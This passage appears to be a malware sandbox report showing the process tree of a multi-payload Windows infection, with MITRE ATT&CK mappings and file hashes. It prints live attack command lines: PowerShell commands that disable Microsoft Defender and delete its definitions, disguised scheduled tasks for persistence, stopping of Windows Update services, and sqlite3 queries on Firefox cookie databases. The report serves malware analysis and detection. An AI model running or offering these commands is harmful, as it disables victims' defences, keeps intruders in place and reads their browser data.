    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    PID:2384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    PID:6452
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Creates scheduled task(s)
    PID:6520
- C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"
  2⤵
  PID:2176
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\265F.tmp\2660.tmp\2661.bat C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"
    3⤵
    PID:2456
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:4752
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:6028
  - - C:\Windows\explorer.exe
      explorer
      4⤵
      PID:5780
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:5100
- C:\Users\Admin\AppData\Local\Temp\Files\newpinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\newpinf.exe"
  2⤵
  PID:5148
- C:\Users\Admin\AppData\Local\Temp\Files\WinScp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WinScp.exe"
  2⤵
  PID:6004
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POWERSHELL.exe
    "POWERSHELL" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files"
    3⤵
    PID:5748
- C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
  2⤵
  PID:5764
- - C:\Users\Admin\AppData\Local\Temp\is-D81FP.tmp\tuc2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-D81FP.tmp\tuc2.tmp" /SL5="$104B0,6524768,419840,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
    3⤵
    PID:1328
- C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe"
  2⤵
  PID:5272
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1552
- - C:\Windows\Temp\tel.exe
    "C:\Windows\Temp\tel.exe"
    3⤵
    PID:5856
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 236
      4⤵
      Program crash
      PID:5940
- - C:\Windows\Temp\fcc.exe
    "C:\Windows\Temp\fcc.exe"
    3⤵
    PID:3896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
      4⤵
      PID:1692
- - C:\Windows\Temp\jjj.exe
    "C:\Windows\Temp\jjj.exe"
    3⤵
    PID:5200
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:5972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 132
      4⤵
      Program crash
      PID:5376
- C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe"
  2⤵
  PID:5380
- - C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe"
    3⤵
    PID:3636
- - C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe"
    3⤵
    PID:4476
- - C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe"
    3⤵
    PID:5248
- - C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe"
    3⤵
    PID:5992
- - C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\somzx.exe"
    3⤵
    PID:3424
- C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
  2⤵
  PID:4172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 476
    3⤵
    - Program crash
    PID:5744
- C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
  2⤵
  PID:2900
- C:\Users\Admin\AppData\Local\Temp\Files\c64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\c64.exe"
  2⤵
  PID:940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Files\c64.exe" > nul
    3⤵
    PID:1536
- C:\Users\Admin\AppData\Local\Temp\Files\Restoro.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Restoro.exe"
  2⤵
  PID:3444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF.bat" > C:\Users\Admin\AppData\Local\Temp\FF.txt"
    3⤵
    PID:3228
  - - C:\Users\Admin\AppData\Local\Temp\sqlite3.exe
      "C:\Users\Admin\AppData\Local\Temp\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sx470w5j.Admin\cookies.sqlite" "select value, expiry from moz_cookies where baseDomain like 'restoro.com' and name='_trackid_product_24';"
      4⤵
      PID:5292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF.bat" > C:\Users\Admin\AppData\Local\Temp\FF.txt"
    3⤵
    PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\sqlite3.exe
      "C:\Users\Admin\AppData\Local\Temp\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sx470w5j.Admin\cookies.sqlite" "select value, expiry from moz_cookies where baseDomain like 'restoro.com' and name='_tracking_product_24';"
      4⤵
      PID:5600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF.bat" > C:\Users\Admin\AppData\Local\Temp\FF.txt"
    3⤵
    PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\sqlite3.exe
      "C:\Users\Admin\AppData\Local\Temp\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sx470w5j.Admin\cookies.sqlite" "select value, expiry from moz_cookies where baseDomain like 'restoro.com' and name='_campaign_product_24';"
      4⤵
      PID:5968
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C tasklist /FI "IMAGENAME eq RestoroMain.exe" > C:\Users\Admin\AppData\Local\Temp\IsProcessActive.txt
    3⤵
    PID:5216
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq RestoroMain.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C tasklist /FI "IMAGENAME eq avupdate.exe" > C:\Users\Admin\AppData\Local\Temp\IsProcessActive.txt
    3⤵
    PID:5348
- C:\Users\Admin\AppData\Local\Temp\Files\spfasiazx.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\spfasiazx.exe"
  2⤵
  PID:5584
- - C:\Users\Admin\AppData\Local\Temp\Files\spfasiazx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\spfasiazx.exe"
    3⤵
    PID:4232
- C:\Users\Admin\AppData\Local\Temp\Files\wlanext.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wlanext.exe"
  2⤵
  PID:6044
- - C:\Users\Admin\AppData\Local\Temp\Files\wlanext.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wlanext.exe"
    3⤵
    PID:5848
- - C:\Users\Admin\AppData\Local\Temp\Files\wlanext.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wlanext.exe"
    3⤵
    PID:1908
- C:\Users\Admin\AppData\Local\Temp\Files\xxx.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xxx.exe"
  2⤵
  PID:5256
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    3⤵
    PID:5188
- C:\Users\Admin\AppData\Local\Temp\Files\i.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\i.exe"
  2⤵
  PID:4300
- C:\Users\Admin\AppData\Local\Temp\Files\Galaxy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Galaxy.exe"
  2⤵
  PID:4292
- - C:\Users\Admin\AppData\Local\Temp\Files\Galaxy.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Galaxy.exe"
    3⤵
    PID:944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error encountered! please try again later.', 0, 'Error', 0+16);close()""
      4⤵
      PID:5824
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error encountered! please try again later.', 0, 'Error', 0+16);close()"
        5⤵
        
        PID:6368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        
        PID:6376
    - - C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        5⤵
        Deletes Windows Defender Definitions
        
        PID:6188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Galaxy.exe'"
      4⤵
      PID:1132
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Galaxy.exe'
        5⤵
        
        PID:6356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6084
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Loads dropped DLL
        
        PID:4456
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5808
- C:\Users\Admin\AppData\Local\Temp\Files\new.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\new.exe"
  2⤵
  PID:720
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:7000
- C:\Users\Admin\AppData\Local\Temp\Files\rundll64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rundll64.exe"
  2⤵
  PID:6900
- C:\Users\Admin\AppData\Local\Temp\Files\31.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\31.exe"
  2⤵
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe"
  2⤵
  PID:7036
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:6632
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:4856
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7096
- C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"
  2⤵
  PID:5212
- - C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"
    3⤵
    PID:652

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3128
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
  2⤵
  PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1752
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  PID:3440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5092
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5100
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3708
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5528
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5596
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:884
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3944
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4792
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1488
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5812
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5316
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6476.bat" "
  2⤵
  PID:5640
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
    3⤵
    PID:5272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E6A.bat" "
  2⤵
  PID:4912
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
    3⤵
    PID:4792
- C:\Users\Admin\AppData\Local\Temp\1588.exe
  C:\Users\Admin\AppData\Local\Temp\1588.exe
  2⤵
  PID:2384
- - C:\Users\Admin\AppData\Local\Temp\1588.exe
    C:\Users\Admin\AppData\Local\Temp\1588.exe
    3⤵
    PID:3488
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\1884ceea-a25f-47bd-a2ab-bc2c60cceb8d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:3112
  - - C:\Users\Admin\AppData\Local\Temp\1588.exe
      "C:\Users\Admin\AppData\Local\Temp\1588.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:5716
    - - C:\Users\Admin\AppData\Local\Temp\1588.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1588.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:2364
      - C:\Users\Admin\AppData\Local\a738233a-2b07-4d1b-830e-3a1eb3be2bda\build2.exe
        
        "C:\Users\Admin\AppData\Local\a738233a-2b07-4d1b-830e-3a1eb3be2bda\build2.exe"
        6⤵
        
        PID:928
        
        C:\Users\Admin\AppData\Local\a738233a-2b07-4d1b-830e-3a1eb3be2bda\build2.exe
        
        "C:\Users\Admin\AppData\Local\a738233a-2b07-4d1b-830e-3a1eb3be2bda\build2.exe"
        7⤵
        
        PID:6008
- C:\Users\Admin\AppData\Local\Temp\2ED4.exe
  C:\Users\Admin\AppData\Local\Temp\2ED4.exe
  2⤵
  PID:4752
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ym4jF80.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ym4jF80.exe
    3⤵
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4pe748nH.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4pe748nH.exe
      4⤵
      PID:3024
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
        5⤵
        
        PID:4736
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5180
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        
        PID:6032
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:6156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 3224
        5⤵
        Program crash
        
        PID:6240
- C:\Users\Admin\AppData\Local\Temp\797A.exe
  C:\Users\Admin\AppData\Local\Temp\797A.exe
  2⤵
  PID:5500

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
- Drops startup file
PID:2700

C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:1340

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x390
1⤵
PID:1944

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:3540

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:2032

C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
1⤵
PID:4352

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:5968

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
1⤵
PID:4676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
  2⤵
  PID:5832
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4884

C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
1⤵
PID:5560

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:3972

C:\Users\Admin\AppData\Roaming\dcfdbae
C:\Users\Admin\AppData\Roaming\dcfdbae
1⤵
PID:4896
- C:\Users\Admin\AppData\Roaming\dcfdbae
  C:\Users\Admin\AppData\Roaming\dcfdbae
  2⤵
  PID:6568

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4784

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "NetworkServiceSys"
1⤵
PID:5704
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe c:\windows\system32\e630025.dll, Launch
  2⤵
  PID:3396

C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
1⤵
PID:424

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:1424

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4384

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
1⤵
PID:4744

C:\Users\Admin\AppData\Roaming\msedge.exe
C:\Users\Admin\AppData\Roaming\msedge.exe
1⤵
PID:4868

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:3824

C:\Users\Admin\AppData\Roaming\msedge.exe
C:\Users\Admin\AppData\Roaming\msedge.exe
1⤵
PID:2136

C:\Users\Admin\AppData\Roaming\dcfdbae
C:\Users\Admin\AppData\Roaming\dcfdbae
1⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
1⤵
PID:6844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Scripting

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\DBViewerAPI\bin\x86\bass.dll

Filesize
14KB

MD5
991799547c69db2c9bd75d8f1a2220f9

SHA1
3ad097f7538fdd73d3fb7e371243b436b0e45297

SHA256
4f0b2ce12e0e8a9e6da223c14c6d9f924a28594ff9c4f6d567bce33cacfad653

SHA512
35fd26aa909d10ffd9b979f0db086af5fb064b182aebff4c2caa00d7f69ffe8babd4b281a9cea9666c6d8a1ffb641ade4bf0029563bdc7456e93bc86b88e519e

Download Submit
C:\Program Files (x86)\DBViewerAPI\bin\x86\bass_aac.dll

Filesize
14KB

MD5
48dbc1e4e4f8ffda46c6d1439a2d15d7

SHA1
2d4b8290f522b73b3b517fcea90bf725fd608307

SHA256
78abc803cefd18e23a0a2430604f35341ed2f90818ca790ce3e66b73b5e2b53d

SHA512
a783b05f7e92bfca8b45654abe6b037c671009d92fd9c860ea2fb499a6fcb1b47a6eb2d225b0729ddb75b829e1562bb9ce2be2eb3a0d3a4797301be6f5b8f330

Download Submit
C:\Program Files (x86)\DBViewerAPI\bin\x86\is-0MQ7V.tmp

Filesize
39KB

